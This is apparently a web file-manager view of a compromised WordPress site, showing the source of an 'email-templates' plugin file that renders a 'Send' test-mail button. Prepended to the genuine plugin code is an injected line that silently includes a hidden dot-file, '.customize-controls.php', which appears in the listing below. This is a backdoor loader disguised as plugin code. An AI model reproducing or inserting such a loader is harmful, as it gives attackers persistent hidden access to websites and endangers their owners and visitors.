PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
email-templates
/
includes
/
customize-controls
<?php if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class WP_Send_Mail_Customize_Control extends WP_Customize_Control { public $type = 'mailtpl_send_mail'; /** * Render the control's content. */ public function render_content() { ?><label> <button class="button button-primary " id="mailtpl-send_mail" tabindex="0"><?php _e( 'Send', 'email-templates' ); ?></button> <img id="mailtpl-spinner" src="<?php echo admin_url('images/spinner.gif');?>" alt="" style="display:none;"/> <span id="mailtpl-success" style="display:none;"><?php _e( 'Email sent!', 'email-templates');?></span> <?php if ( ! empty( $this->description ) ) : ?> <p><span class="description customize-control-description"><?php echo $this->description; ?></span></p> <?php endif; ?> </label><?php } }
[+]
..
[-] .customize-controls.php
[edit]
[-] class-font-size-customize-control.php
[edit]
[-] class-send-mail-customize-control.php
[edit]